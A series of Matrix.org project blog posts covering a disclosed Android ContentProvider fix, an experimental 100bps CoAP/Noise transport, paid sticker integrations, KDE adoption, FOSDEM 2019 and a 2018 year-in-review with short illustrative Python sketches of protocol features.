  • Remove obsolete and buggy ContentProvider which could allow a malicious local app to compromise account data. Many thanks to Julien Thomas (@julien_thomas) from Protektoid Project for identifying this and responsibly disclosing it!

The fix for this shipped on F-Droid since 0.8.28a, and on the Play Store, the fix is present in both v0.9.0 (the first version of the re-published Riot app) and v0.8.99 (the last version of the old Riot app, which told everyone to reinstall). Other forks of Riot which we’re aware of have also been informed and should be updated.

If you haven’t already updated, please do so now.

Breaking the 100bps barrier with Matrix, meshsim & coap-proxy

12.03.2019 00:00 — In the News Matthew Hodgson

Hi all,

Last month at FOSDEM 2019 we gave a talk about a new experimental ultra-low-bandwidth transport for Matrix which swaps our baseline HTTPS+JSON transport for a custom one built on CoAP+CBOR+Noise+Flate+UDP.  (CoAP is the RPC protocol; CBOR is the encoding; Noise powers the transport layer encryption; Flate compresses everything using predefined compression maps.)

The challenge here was to see if we could demonstrate Matrix working usably over networks running at around 100 bits per second of throughput (where it'd take 2 minutes to send a typical 1500 byte ethernet packet!!) and very high latencies.  You can see the original FOSDEM talk below, or check out the slides here.

Now, it's taken us a little while to find time to tidy up the stuff we demo'd in the talk to be (relatively) suitable for public consumption, but we're happy to finally release the four projects which powered the demo.

In order to get up and running, the meshsim README has all the details.

It's important to understand that this is very much a proof of concept, and shouldn't be used in production yet, and almost certainly has some glaring bugs.  In fact, it currently assumes you are running on a trusted private network rather than the public Matrix network in order to get away with some of the bandwidth optimisations performed - see coap-proxy's Limitations section for details.  Particularly, please note that the encryption is homemade and not audited or fully reviewed or tested yet.  Also, we've released the code for the low-bandwidth transport, but we haven't released the "fan-out routing" implementation for Synapse as it needs a rethink to be applicable to the public Matrix network.  You'll also want to run Riot/Web in low-bandwidth mode if you really wind down the bandwidth (suppressing avatars, read receipts, typing notifs and presence to avoid wasting precious bandwidth).

We also don't have an MSC for the CoAP-based transport yet, mainly due to lack of time whilst wanting to ensure the limitations are addressed first before we propose it as a formal alternative Matrix transport.  (We also first need to define negotiation mechanisms for entirely alternative CS & SS transports!).  However, the quick overview is:

  • JSON is converted directly into CBOR (with a few substitutions made to shrink common patterns down)
  • HTTP is converted directly into CoAP (mapping the verbose API endpoints down to single-byte endpoints)
  • TLS is swapped out for Noise Pipes (XX + IK noise handshakes).  This gives us 1RTT setup (XX) for the first connection to a host, and 0RTT (IK) for all subsequent connections, and provides trust-on-first-use semantics when connecting to a server.  You can see the Noise state machine we maintain in go-coap's noise.go.
  • The CoAP headers are hoisted up above the Noise payload, letting us use them for framing the noise pipes without having duplicated framing headers at the CoAP & Noise layers.  We also frame the Noise handshake packets as CoAP with custom message types (250, 251 and 252).  We might be better off using OSCORE for this, however, rather than hand-wrapping a custom encrypted transport...
  • The CoAP payload is compressed via Flate using preshared compression tables derived from compressing large chunks of representative Matrix traffic. This could be significantly improved in future with streaming compression and dynamic tables (albeit seeded from a common set of tables).

The end result is that you end up taking about 90 bytes (including ethernet headers!) to send a typical Matrix message (and about 70 bytes to receive the acknowledgement).  This breaks down as:
  • 14 bytes of Ethernet headers
  • 20 bytes of IP headers
  • 8 bytes of UDP headers
  • 16 bytes of Noise AEAD
  • 6 bytes of CoAP headers
  • ~26 bytes of compressed and encrypted CBOR
The Noise handshake on connection setup would take an additional 128 bytes (4x 32 byte Curve25519 DH values), either spread over 1RTT for initial setup or 0RTT for subsequent setups.

At 100bps, 90 bytes takes 90*8/100 = 7.2s to send... which is just about usable in an extreme life and death situation where you can only get 100bps of connectivity (e.g. someone at the bottom of a ravine trying to trickle data over one bar of GPRS to the emergency services).  In practice, on a custom network, you could ditch the Ethernet and UDP/IP headers if on a point-to-point link for CS API, and ditch the encryption if the network physical layer was trusted - at which point we're talking ~32 bytes per request (2.5s to send at 100bps).  Then, there's still a whole wave of additional work that could be investigated, including...

  • Smarter streaming compression (so that if a user says 'Hello?' three times in a row, the 2nd and 3rd messages are just references to the first pattern)
  • Hoisting Matrix transaction IDs up to the CoAP layer (reusing the CoAP msgId+token rather than passing around new Matrix transaction IDs, at the expense of requiring one Matrix txn per request)
  • Switching to CoAP OBSERVE for receiving data from the server (currently we long-poll /sync to receive data)
  • Switching access_tokens for PSKs or similar
...all of which could shrink the payload down even further.  That said, even in its current state, it's a massive improvement - roughly ~65x better than the equivalent HTTPS+JSON traffic.

In practice, further work on low-bandwidth Matrix is dependent on finding a sponsor who's willing to fund the team to focus on this, as otherwise it's hard to justify spending time here in addition to all the less exotic business-as-usual Matrix work that we need to keep the core of Matrix evolving (finishing 1.0, finishing E2E encryption, speeding up Synapse, finishing Dendrite, rewriting Riot/Android etc).  However, the benefits here should be pretty obvious: massively reduced bandwidth and battery-life; resilience to catastrophic network conditions; faster sync times; and even a protocol suitable for push notifications (Matrix as e2e encrypted, decentralised, push!).  If you're interested in supporting this work, please contact support at matrix.org.

Experiments with payments over Matrix

07.03.2019 00:00 — In the News Matthew Hodgson

Hi all,

Heads up that Modular.im (the paid hosting Matrix service provided by New Vector, the company who employs much of the Matrix core team) launched a pilot today for paid Matrix integrations in the form of paid sticker packs.  Yes kids, it's true - for only $0.50 you can slap Matrix and Riot hex stickers all over your chatrooms. It's a toy example to test the payments infrastructure and demonstrate the concept - the proceeds go towards funding development work on Matrix.org :)   You can read more about it over on Modular's blog.

We wanted to elaborate on this a bit from the Matrix.org perspective, specifically:

  • We are categorically not baking payments or financial incentives as a first class citizen into Matrix, and we're not going to start moving stuff behind paywalls or similar.
  • This demo is a proof-of-concept to illustrate how folks could do this sort of thing in general in Matrix - it's not a serious product in and of itself.
  • What it shows is that an Integration Manager like Modular can be used as a way to charge for services in Matrix - whether that's digital content within an integration, or bots/bridges/etc.
  • While Modular today gathers payments via credit-card (Stripe), it could certainly support other mechanisms (e.g. cryptocurrencies) in future.
  • The idea in future is for Modular to provide this as a mechanism that anyone can use to charge for content on Matrix - e.g. if you have your own sticker pack and want to sell it to people, you'll be able to upload it and charge people for it.
Meanwhile, there's a lot of interesting stuff on the horizon with integration managers in general - see MSC1236 and an upcoming MSC from TravisR (based around https://github.com/matrix-org/matrix-doc/issues/1286) proposing new integration capabilities.  We're also hoping to implement inline widgets soon (e.g. chatbot buttons for voting and other semantic behaviour) which should make widgets even more interesting!

So, feel free to go stick some hex stickers on your rooms if you like and help test this out.  In future there should be more useful things available :)

Welcome to Matrix, KDE!

20.02.2019 00:00 — General Matthew Hodgson

Hi all,

We're very excited to officially welcome the KDE Community on to Matrix as they announce that KDE Community is officially adopting Matrix as a chat platform, and kde.org now has an official Matrix homeserver!

You can see the full announcement and explanation over at https://dot.kde.org/2019/02/20/kde-adding-matrix-its-im-framework.  It is fantastic to see one of the largest Free Software communities out there proactively adopting Matrix as an open protocol, open network and FOSS project, rather than drifting into a proprietary centralised chat system.  It's also really fun to see Riot 1.0 finally holding its own as a chat app against the proprietary alternatives!

This doesn't change the KDE rooms which exist in Matrix today or indeed the KDE Freenode IRC channels - so many of the KDE community were already using Matrix, all the rooms already exist and are already bridged to the right places.  All it means is that there's now a shiny new homeserver (powered by Modular.im) on which KDE folk are welcome to grab an account if they want, rather than sharing the rather overloaded public matrix.org homeserver.  The rooms have been set up on the server to match their equivalent IRC channels - for instance, #kde:kde.org is the same as #kde on Freenode; #kde-devel:kde.org is the same as #kde-devel etc.  The rooms continue to retain their other aliases (#kde:matrix.org, #freenode_#kde:matrix.org etc) as before.

There's also a dedicated Riot/Web install up at https://webchat.kde.org, and instructions on connecting via other Matrix clients up at https://community.kde.org/Matrix.

This is great news for the Matrix ecosystem in general - and should be particularly welcome for Qt client projects like Quaternion, Spectral and Nheko-Reborn, who may feel a certain affinity to KDE!

So: welcome, KDE!  Hope you have a great time, and please let us know how you get on, so we can make sure Matrix kicks ass for you :)

  • the Matrix Core Team

Matrix at FOSDEM 2019

04.02.2019 00:00 — In the News Matthew Hodgson

Hi all,

We just got back from braving the snow in Brussels at FOSDEM 2019 - Europe's biggest Open Source conference. I think it's fair to say we had an amazing time, with more people than ever before wanting to hang out and talk Matrix and discuss their favourite features (and bugs)!

The big news is that we released r0.1 of Matrix's Server-Server API late on Friday night - our first ever formal stable release of Matrix's Federation API, having addressed the core of the issues which have kept Federation in beta thus far. We'll go into more detail on this in a dedicated blog post, but this marks the first ever time that all of Matrix's APIs have had an official stable release.  All that remains before we declare Matrix out of beta is to release updates of the CS API (0.5) and possibly the IS API (0.2) and then we can formally declare the overall combination as Matrix 1.0 :D

We spoke about SS API r0.1 at length in our main stage FOSDEM talk on Saturday - as well as showing off the Riot Redesign, the E2E Encryption Endgame and giving an update on the French Government deployment of Matrix and the focus it's given us on finally shipping Matrix 1.0! For those who weren't there or missed the livestream, here's the talk!  Slides are available here.

Full house for @ara4n talking about @matrixdotorg and the French State @fosdem It was a packed presentation full of lots exciting progress demos. So sorry for practically yanking you offstage in the end! pic.twitter.com/idshDcSRhv

— Rob Pickering (@RobinJPickering) February 2, 2019

Then, on Sunday we had the opportunity to have a quick 20 minute talk in the Real Time Comms dev room, where we gave a tour of some of the work we've been doing recently to scale Matrix down to working on incredibly low bandwidth networks (100bps or less).  It's literally the opposite of the Matrix 1.0 / France talk in that it's a quick deep dive into a very specific problem area in Matrix - so, if you've been looking forward to Matrix finally having a better transport than HTTPS+JSON, here goes!  Slides are available here.

Full house for @matrixdotorg ? #FOSDEM #RTCsevroom pic.twitter.com/dDQnD3mzmc

— Saúl Ibarra Corretgé (@saghul) February 3, 2019

Huge thanks to everyone who came to the talks, and everyone who came to the stand or grabbed us for a chat! FOSDEM is an amazing way to be reminded in person that folks care about Matrix, and we've come away feeling more determined than ever to make Matrix as great as possible and provide a protocol+network which will replace the increasingly threatened proprietary communication silos. :)

Next up: Matrix 1.0...

The 2018 Matrix Holiday Special!

25.12.2018 00:00 — General Matthew Hodgson

Hi all,

It's that time again where we break out the mince pies and brandy butter (at least for those of us in the UK) and look back on the year to see how far Matrix has come, as well as anticipate what 2019 may bring!

Overview

It's fair to say that 2018 has been a pretty crazy year.  We have had one overriding goal: to take the funding we received in January, stabilise and freeze the protocol and get it and the reference implementations out of beta and to a 1.0 - to provide a genuinely open and decentralised mainstream alternative to the likes of Slack, Discord, WhatsApp etc.  What's so crazy about that, you might ask?

Well, in parallel with this we've also seen adoption of Matrix accelerating ahead of our dev plan at an unprecedented speed: with France selecting Matrix to power the communication infrastructure of its whole public sector - first trialling over the summer, and now confirmed for full roll-out as of a few weeks ago.  Meanwhile there are several other similar-sized projects on the horizon which we can't talk about yet.  We've had the growing pains of establishing New Vector as a startup in order to hire the core team and support these projects.  We've launched Modular to provide professional-quality SaaS Matrix hosting for the wider community and help fund the team.  And most importantly, we've also been establishing the non-profit Matrix.org Foundation to formalise the open governance of the Matrix protocol and protect and isolate it from any of the for-profit work.

However: things have just about come together.  Almost all the spec work for 1.0 is done and we are now aiming to get a 1.0 released by the end of January (in time for FOSDEM).  Meanwhile Synapse has improved massively in terms of performance and stability (not least having migrated over to Python 3); Riot's spectacular redesign is available for testing right now; E2E encryption is more stable than ever with the usability rework landing as we speak.  And we've even got a full rewrite of Riot/Android in the wings.

But it's certainly been an interesting ride.  Longer-term spec work has been delayed by needing to apply band-aids to mitigate abuse of the outstanding issues.  Riot redesign was pushed back considerably due to prioritising Riot performance over UX. The E2E UX work has forced us to consider E2E holistically… which does not always interact well with structuring the dev work into bite-sized chunks.  Dendrite has generally been idling whilst we instead pour most of our effort into getting to 1.0 on Synapse (rather than diluting 1.0 work across both projects). These tradeoffs have been hard to make, but hopefully we have chosen the correct path in the end.

Overall, as we approach 1.0, the project is looking better than ever - hopefully everyone has seen both Riot and Synapse using less RAM and being more responsive and stable, E2E being more reliable, and anyone who has played with the Riot redesign beta should agree that it is light-years ahead of yesterday's Riot and something which can genuinely surpass today's centralised proprietary incumbents. And that is unbelievably exciting :D

We'd like to thank everyone for continuing to support Matrix - especially our Patreon & Liberapay supporters, whose donations continue to be critical for helping fund the core dev team, and also those who are supporting the project indirectly by hosting homeservers with Modular.  We are going to do everything humanly possible to ship 1.0 over the coming weeks, and then the sky will be the limit!

Before going into what else 2019 will hold, however, let's take the opportunity to give a bit more detail on the various core team projects which landed in 2018…

France

DINSIC (France's Ministry of Digital, IT & Comms) have been busy building out their massive cross-government Matrix deployment and custom Matrix client throughout most of the year.  After the announcement in April, this started off with an initial deployment over the summer, and is now moving towards the full production rollout, as confirmed at the Paris Open Source Summit a few weeks ago by Mounir Mahjoubi, the Secretary of State of Digital.  All the press coverage about this ended up in French, with the biggest writeup being at CIO Online, but the main mention of Matrix (badly translated from French) is:

Denouncing the use of tools such as WhatsApp; a practice that has become commonplace within ministerial offices, Mounir Mahjoubi announced the launch in production of Tchap, based on Matrix and Riot: an instant messaging tool that will be provided throughout the administrations. So, certainly, developing a product can have a certain cost. Integrating it too. "Free is not always cheaper but it's always more transparent," admitted the Secretary of State.

The project really shows off Matrix at its best, with up to 60 different deployments spread over different ministries and departments; multiple clusters per Ministry; end-to-end encryption enabled by default (complete with e2e-aware antivirus scanning); multiple networks for different classes of traffic; and the hope of federating with the public Matrix network once the S2S API is finalised and suitable border gateways are available.  It's not really our project to talk about, but we'll try to share as much info as we can as roll-out continues.

The Matrix Specification

A major theme throughout the year has been polishing the Matrix Spec itself for its first full stable release, having had more than enough time to see which bits work in practice now and which bits need rethinking.  This all kicked off with the creation of the Matrix Spec Change process back in May, which provides a formal process for reviewing and accepting contributions from anyone into the spec.  Getting the balance right between agility and robustness has been quite tough here, especially pre-1.0 where we've needed to move rapidly to resolve the remaining long-lived sticking points.  However, a process like this risks encouraging the classic “Perfect is the Enemy of Good” problem, as all and sundry jump in to apply their particular brand of perfectionism to the spec (and/or the process around it) and risk smothering it to death with enthusiasm.  So we've ended up iterating a few times on the process and hopefully now converged on an approach which will work for 1.0 and beyond. If you haven't checked out the current proposals guide please give it a look, and feel free to marvel at all the MSCs in flight.  You can also see a quick and dirty timeline of all the MSC status changes since we introduced the process, to get an idea of how it's all been progressing.

In August we had a big sprint to cut stable “r0” releases of all the APIs of the spec which had not yet reached a stable release (i.e. all apart from the Client-Server API, which has been stable since Dec 2015 - hence in part the large number of usable independent Matrix clients relative to the other bits of the ecosystem).  In practice, we managed to release 3 out of the 4 remaining APIs - but needed more time to solve the remaining blocking issues with the Server-Server API. So since August (modulo operational and project distractions) we've been plugging away on the S2S API.  

The main blocking issue for a stable S2S API has been State Resolution. This is the fundamental algorithm used to determine the state of a given room whenever a race or partition happens between the servers participating in it.  For instance: if Alice kicks Bob on her server at the same time as Charlie ops Bob on his server, who should win? It's vital that all servers reach the same conclusion as to the state of the room, and we don't want servers to have to replicate a full copy of the room's history (which could be massive) to reach a consistent conclusion.  Matrix's original state resolution algorithm dates back to the initial usable S2S implementation at the beginning of 2015 - but over time deficiencies in the algorithm became increasingly apparent. The most obvious issue is the “Hotel California” bug, where users can be spontaneously re-joined to a room they've previously left if the room's current state is merged with an older copy of the room on another server and the 'wrong' version wins the conflict - a so-called state-reset.

After a lot of thought we ended up proposing an all-new State Resolution algorithm in July 2018, nicknamed State Resolution Reloaded.  This extends the original algorithm to consider the 'auth chain' of state events when performing state resolution (i.e. the sequence of events that a given state event cites as evidence of its validity) - as well as addressing a bunch of other issues.  For those wishing to understand in more detail, there's the MSC itself, the formal terse description of the algorithm now merged into the unstable S2S spec - or alternatively there's an excellent step-by-step explanation and guided example from uhoreg (warning: contains Haskell :)  Or you can watch Erik and Matthew try to explain it all on Matrix Live back in July.
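
To give a feel for the shape of the thing (rather than the algorithm itself), here's a deliberately tiny Python sketch of the general idea: order the conflicting state events deterministically, then apply them one at a time, only accepting an event if it passes the auth checks against the state accumulated so far.  The ordering key and the auth_chain/passes_auth helpers below are illustrative stand-ins, not the real definitions from the MSC.

    # Illustrative sketch only: the real ordering and auth rules live in the MSC.
    # auth_chain(event) and passes_auth(event, state) are hypothetical helpers.
    def resolve_conflicts(conflicted_events, unconflicted_state):
        # Sort candidates deterministically so that every server, given the same
        # events, arrives at exactly the same answer.
        ordered = sorted(
            conflicted_events,
            key=lambda e: (len(auth_chain(e)), e["origin_server_ts"], e["event_id"]),
        )

        state = dict(unconflicted_state)
        for event in ordered:
            # Only accept an event if the state built up so far authorises it -
            # this is what stops a stale event from "winning" and causing a
            # state reset such as the Hotel California bug.
            if passes_auth(event, state):
                state[(event["type"], event.get("state_key", ""))] = event
        return state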

Since the initial proposal in July, the algorithm has been proofed out in a test jig, iterated on some more to better specify how to handle rejected events, implemented in Synapse, and is now ready to roll.  The only catch is that to upgrade to it we've had to introduce the concept of room versioning, and to flush out historical issues we require you to re-create rooms to upgrade them to the new resolution algorithm. Getting the logistics in place for this is a massive pain, but we've got an approach now which should be sufficient. Clients will be free to smooth over the transition in the UI as gracefully as possible (and in fact Riot has this already hooked up).  So: watch this space as v2 rooms with all-new state resolution land in the coming weeks!
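
For the curious, the room upgrade flow as currently implemented looks roughly like the sketch below: the client asks its server to upgrade the room, and the server creates a replacement room in the new version and drops an m.room.tombstone event into the old one pointing at it.  Treat the endpoint path and the "2" version string as assumptions based on current development builds - they may change before this is formally specced.

    # A rough sketch, assuming the draft upgrade endpoint as it exists in current
    # development builds; the path and version string may change before 1.0.
    import requests

    def upgrade_room(homeserver, access_token, room_id, new_version="2"):
        resp = requests.post(
            f"{homeserver}/_matrix/client/r0/rooms/{room_id}/upgrade",
            headers={"Authorization": f"Bearer {access_token}"},
            json={"new_version": new_version},
        )
        resp.raise_for_status()
        # The old room gets an m.room.tombstone event pointing at the new one,
        # which clients can use to show a "this room has been upgraded" banner.
        return resp.json()["replacement_room"]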

Otherwise, there are a bunch of other issues in the S2S API which we are still working through (e.g. changing event IDs to be hashes of event contents to avoid servers lying about IDs, and switching to normal X.509 certificates for federation to resolve the problems with Perspectives, etc).
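
As a rough illustration of the event ID change (the exact canonicalisation and encoding are still being settled, so treat this purely as a sketch): rather than trusting whatever ID the origin server picked, the ID is derived from the event content itself, so a server can no longer advertise two different events under the same ID.  The canonical_json helper below is a hypothetical stand-in for Matrix's canonical JSON encoding rules.

    # Sketch only: derive an event ID from a hash of the (redacted) event rather
    # than trusting the origin server's chosen ID.  canonical_json is a
    # hypothetical helper standing in for Matrix's canonical JSON rules.
    import base64
    import hashlib

    def event_id_from_content(redacted_event):
        digest = hashlib.sha256(canonical_json(redacted_event)).digest()
        # Unpadded URL-safe base64, prefixed like other Matrix event IDs.
        return "$" + base64.urlsafe_b64encode(digest).decode().rstrip("=")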

Once these land and are implemented in Synapse over the coming weeks, we will be able to finally declare a 1.0!

Also on the spec side of things, it's worth noting that a lot of effort went into improving performance for clients in the form of the Lazy Loading Members MSC.  This ended up consuming a lot of time over the summer as we updated Synapse and the various matrix-*-sdks (and thus Riot) to only calculate and send details to clients about the members who are currently talking in a room, whereas previously we sent the entire state of the room to the client (even including users who had left). The end result, however, is a 3-5x reduction in RAM on Riot, and a 3-5x speedup on initial sync.  The MSC is currently being merged into the main spec as we speak (thanks Kitsune!) for inclusion in the upcoming CS API 0.5.
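
In case you're wondering what this looks like from a client's point of view, opting in is just a matter of setting a flag in the filter passed to /sync - roughly as sketched below.  The filter shape matches the MSC as it stands, but check the final spec text before relying on it.

    # Roughly how a client opts into lazy-loaded membership on /sync, per the
    # Lazy Loading Members MSC; double-check the final spec before relying on it.
    import json
    import requests

    def lazy_sync(homeserver, access_token, since=None):
        lazy_filter = {"room": {"state": {"lazy_load_members": True}}}
        params = {"filter": json.dumps(lazy_filter)}
        if since:
            params["since"] = since
        resp = requests.get(
            f"{homeserver}/_matrix/client/r0/sync",
            headers={"Authorization": f"Bearer {access_token}"},
            params=params,
        )
        resp.raise_for_status()
        return resp.json()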

The Matrix.org Foundation (CIC!)

Alongside getting the open spec process up and running, we've been establishing The Matrix.org Foundation as an independent non-profit legal entity responsible for neutrally safeguarding the Matrix spec and evolution of the protocol.  This kicked off in June with the “Towards Open Governance” blog post, and continued with the formal incorporation of The Matrix.org Foundation in October.  Since then, we've spent a lot of time with the non-profit lawyers evolving MSC1318 into the final Articles of Association (and other guidelines) for the Foundation.  This work is basically done now; it just needs MSC1318 to be updated with the conclusions (which we're running late on, but it's top of Matthew's MSC todo list).

In other news, we have confirmation that the Community Interest Company (CIC) status for The Matrix.org Foundation has been approved - this means that the CIC Regulator has independently reviewed the initial Articles of Association and approved that they indeed lock the mission of the Foundation to be non-profit and to act solely for the good of the wider online community.  In practice, this means that the Foundation will be formally renamed The Matrix.org Foundation C.I.C, and provides a useful independent safeguard to ensure the Foundation remains on track.

The remaining work on the Foundation is:

  • Update and land MSC1318, particularly on clarifying the relationship between the legal Guardians (Directors) of the Foundation and the technical members of the core spec team, and how funds of the Foundation will be handled.
  • Update the Articles of Association of the Foundation based on the end result of MSC1318
  • Transfer any Matrix.org assets over from New Vector to the Foundation.  Given Matrix's code is all open source, there isn't much in the way of assets - we're basically talking about the matrix.org domain and website itself.
  • Introduce the final Guardians for the Foundation.
We'll keep you posted with progress as this lands over the coming months.

Riot

2018 has been a bit of a chrysalis year for Riot: the vast majority of work has been going into the massive redesign we started in May to improve usability & cosmetics, performance, stability, and E2E encryption usability improvements.  We've consciously spent most of the year feature frozen in order to polish what we already have, as we've certainly been guilty in the past of landing way too many features without necessarily applying the needed amount of UX polish.

However, as of today, we're super-excited to announce that Riot's redesign is at the point where the intrepid can start experimenting with it - in fact, internally most of the team has switched over to dogfooding (testing) the redesign as of a week or so ago.  Just shut down your current copy of Riot/Web or Desktop and go to https://riot.im/experimental instead if you want to experiment (we don't recommend running both at the same time).  Please note that it is still work-in-progress and there's a lot of polish still to land and some cosmetic bugs still hanging around, but it's definitely at the point of feeling better than the old app.  Most importantly, please provide feedback (by hitting the lifesaver-ring button at the bottom left) to let us know how you get on. See the Riot blog for more details!

Meanwhile, on the performance and stability side of things - Lazy Loading (see above) made a massive difference to performance on all platforms; shrinking RAM usage by 3-5x and similarly speeding up launch and initial sync times.  Ironically, this ended up pushing back the redesign work, but hopefully the performance improvements will have been noticeable in the interim.  We also switched the entire rich text composer from using Facebook's Draft.js library to instead use Slate.js (which has generally been a massive improvement for stability and maintainability, although it took ages to land - huge thanks to t3chguy for getting it over the line). Meanwhile Travis has been blitzing through a massive list of key “First Impression” bugs to ensure that as many of Riot's most glaring usability gotchas as possible are solved.

We also welcomed ever-popular Stickers to the fold - the first instance of per-account rather than per-room widgets, which ended up requiring a lot of new infrastructure in both Riot and the underlying integration manager responsible for hosting the widgets.  But judging by how popular they are, the effort seems to be worth it - and paves the way for much more exciting interactive widgets and integrations in future!

An unexpectedly large detour/distraction came in the form of GDPR back in May - we spent a month or so running around ensuring that both Riot and Matrix are GDPR compliant (including the necessary legal legwork to establish how GDPR even applies to a decentralised technology like Matrix).  If you missed all that fun, you can read about it here.  Hopefully we won't have to do anything like that again any time soon...

And finally: on the mobile side, much of the team has been distracted helping out France with their Matrix deployment.  However, we've been plugging away on Riot/Mobile, keeping pace with the development on Riot/Web - but most excitingly, we've also found time to experiment with a complete rewrite of Riot/Android in Kotlin, using Realm and Rx (currently nicknamed Riot X).  The rewrite was originally intended as a test-jig for experimenting with the redesign on mobile, but it's increasingly becoming a fully fledged Matrix client… which launches and syncs over 5x faster than today's Riot/Android.  If you're particularly intrepid you should be able to run the app by checking out the project in Android Studio and hitting 'run'. We expect the rewrite to land properly in the coming months - watch this space for progress!

E2E Encryption

One of the biggest projects this year has been to get E2E encryption out of beta and turned on by default.  Now, whilst the encryption itself in Matrix has been cryptographically robust since 2016 - its usability has been minimal at best, and we'd been running around polishing the underlying implementation rather than addressing the UX.  However, this year that changed, as we opened a war on about 6 concurrent battlefronts to address the remaining issues. These are:

  • Holistic UX.  Designing a coherent, design-led UX across all of the encryption and key-management functionality.  Nad (who joined Matrix as a fulltime Lead UI/UX designer in August) has been leading the charge on this - you can see a preview of the end result here.  Meanwhile, Dave and Ryan are working through implementing it as we speak.
  • Decryption failures (UISIs).  Whenever something goes wrong with E2E encryption, the symptoms are generally the same: you find yourself unable to decrypt other people's messages.  We've been plugging away chasing these down - for instance, switching from localStorage to IndexedDB in Riot/Web for storing encryption state (to make it harder for multiple tabs to collide and corrupt your encryption state); providing mechanisms to unwedge Olm sessions which have got corrupted (e.g. by restoring from backup); and many others.  We also added full telemetry to track the number of UISIs people are seeing in practice - and the good news is that over the course of the year their occurrence has been steadily reducing.  The bad news is that there are still some edge cases left: so whenever you fail to decrypt a message, please make sure you submit a bug report and debug logs from *both* the sender and receiving device.  The end is definitely in sight on these, however, and the good news is that other battlefronts will also help mitigate UISIs.
  • Incremental Key Backup.  Previously, if you only used one device (e.g. your phone) and you lost that phone, you would lose all your E2E history unless you were in the habit of explicitly backing up your keys by hand.  Nowadays, we have the ability to optionally let users encrypt their keys with a passphrase (or recovery key) and constantly upload them to the server for safe keeping.  This was a significant chunk of work which has actually already landed in Riot/Web and Riot/iOS, but it is hidden behind a “Labs” feature flag in Settings whilst we test it and sort out the final UX.
  • Cross-signing Keys. Previously, the only way to check whether you were talking to a legitimate user or an imposter was to independently compare the fingerprints of the keys of the device they claim to be using.  In the near future, we will let users prove that they own their devices by signing them with a per-user identity key, so you only have to do this check once. We've actually already implemented one iteration of cross-signing, but this allowed arbitrary devices for a given user to attest each other (which creates a directed graph of attestations, and associated problems with revocations), hence switching to a simpler approach.
  • Improved Verification. Verifying keys by manually comparing elliptic curve key fingerprints is incredibly cumbersome and tedious.  Instead, we have proposals for using Short Authentication String (SAS) comparisons and QR-code scanning to simplify the process.  uhoreg is currently implementing these as we speak :) (There's a rough sketch of the SAS idea just after this list.)
  • Search.  Solving encrypted search is Hard, but t3chguy did a lot of work earlier in the year to build out matrix-search: essentially a js-sdk bot which you can host and hand your keys to, and which will archive your history using a golang full-text search engine (bleve) and expose a search interface that replaces Synapse's default one.  Of all the battlefronts this one is progressing the least right now, but the hope is to integrate it into Riot/Desktop or other clients so that folks who want to index all their conversations have the means to do so.  On the plus side, all the necessary building blocks are available thanks to t3chguy's hacking.
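
As promised above, here's a deliberately hand-wavy sketch of the Short Authentication String idea: both devices agree a shared secret (via an ECDH exchange), feed it through a key derivation function, and turn a handful of the resulting bits into emoji which the humans compare out-of-band.  The info string and the 6-byte/7-emoji split below follow the current proposal as we understand it, but the exact constants and the emoji table are defined by the MSC, not by this sketch.

    # Hand-wavy sketch of SAS emoji generation; the real constants, info strings
    # and emoji table are defined by the verification MSC, not here.
    import hashlib
    import hmac

    def hkdf_sha256(secret, info, length):
        # Minimal HKDF (RFC 5869) with an all-zero salt - enough for a sketch.
        prk = hmac.new(b"\x00" * 32, secret, hashlib.sha256).digest()
        out, block, counter = b"", b"", 1
        while len(out) < length:
            block = hmac.new(prk, block + info + bytes([counter]), hashlib.sha256).digest()
            out += block
            counter += 1
        return out[:length]

    def sas_emoji_indices(shared_secret, info=b"MATRIX_KEY_VERIFICATION_SAS"):
        # Take 42 bits of KDF output and split them into seven 6-bit numbers,
        # each indexing into a 64-entry emoji table shared by both devices.
        bits = int.from_bytes(hkdf_sha256(shared_secret, info, 6), "big")
        return [(bits >> (48 - 6 * (i + 1))) & 0x3F for i in range(7)]
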
So, TL;DR: E2E is hard, but the end is in sight thanks to a lot of blood, sweat and tears.  It's possible that we may have opened up too many battlefronts in finishing it off rather than landing stuff gradually.  But it should be transformative when it all lands - and we'll finally be able to turn it on by default for private conversations.  Again, we're aiming to pull this together by the end of January.

Separately, we've been keeping a close eye on MLS - the IETF's activity around standardising scalable group E2E encryption.  MLS has a lot of potential and could provide algorithmic improvements over Olm & Megolm (whilst paving the way for interop with other MLS-encrypted comms systems).  But it's also quite complicated, and is at risk of designing out support for decentralised environments. For now, we're obviously focusing on ensuring that Matrix is rock solid with Olm & Megolm, but once we hit that 1.0 we'll certainly be experimenting a bit with MLS too.

Homeservers

The story of the Synapse team in 2018 has been one of alternating between solving scaling and performance issues to support the ever-growing network (especially the massive matrix.org server)... and dealing with S2S API issues; both in terms of fixing the design of State Resolution, Room Versioning etc (see the Spec section above) and doing stop-gap fixes to the current implementation.

Focusing on the performance side of things, the main wins have been:

  • Splitting yet more functionality out into worker processes which can scale independently of the master Synapse process.
  • Yet more profiling and optimisation (particularly caching).  Between this and the worker split-out we were able to resolve the performance ceiling that we hit over the summer, and as of right now matrix.org feels relatively snappy.
  • Lazy Loading Members.
  • Python 3.  As everyone should have seen by now, Synapse is now Python 3 by default as of 0.34, which provides significant RAM and CPU improvements across the board as well as a path forwards given Python 2's planned demise at the end of 2019.  If you're not running your Synapse on Python 3 today, you are officially doing it wrong.
There are also some major improvements which haven't fully landed yet:
  • State compression.  We have a new algorithm for storing room state which is ~10x more efficient than the current one.  We'll be migrating to it by default in future. If you're feeling particularly intrepid you can actually use it manually today (but we don't recommend it yet).
  • Incremental state resolution.  Before we got sucked into redesigning state resolution in general, Erik came up with a proof that it's possible to memoize state resolution and incrementally calculate it whenever state is resolved in a room, rather than recalculating it from scratch each time (as the current implementation does).  This would be a significant performance improvement, given non-incremental state res can consume a lot of CPU (making everything slow down when there are lots of room extremities to resolve) and a lot of RAM - it has been one of the reasons that Synapse's RAM usage can sometimes spike badly. The good news is that the new state res algorithm was designed to also work in this manner.  The bad news is that we haven't yet got back to implementing it, given the new algorithm is only just being rolled out now. (There's a quick sketch of the memoization idea just after this list.)
